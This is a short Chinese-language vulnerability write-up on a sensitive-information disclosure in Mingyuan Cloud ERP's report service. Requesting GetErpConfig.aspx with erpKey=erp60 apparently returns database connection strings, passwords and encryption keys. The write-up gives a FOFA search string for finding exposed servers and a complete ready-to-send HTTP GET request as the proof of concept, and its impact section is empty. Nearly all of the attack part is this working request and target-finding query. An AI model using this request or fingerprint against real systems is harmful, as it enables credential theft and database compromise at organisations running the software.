明源云ERP报表服务GetErpConfig.aspx接口存在敏感信息泄露

一、漏洞简介

在访问 /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 路径时，返回了包含敏感信息的响应。这些信息包括但不限于数据库连接字符串、用户名、密码、加密密钥等。这些敏感信息的暴露可能导致以下风险：数据库访问风险：攻击者可以利用数据库连接字符串中的用户名和密码直接访问数据库，从而获取或篡改敏感数据。加密风险：攻击者可以利用加密密钥解密或篡改加密数据，导致数据泄露或数据完整性受损。系统管理风险：攻击者可以利用管理员用户代码进行系统管理操作，进一步扩大攻击范围。

二、漏洞影响

三、网络测绘：

fofa:
body="报表服务已正常运行"

四、复现过程

前置条件

前台

首页

步骤 POC 1

数据包

GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close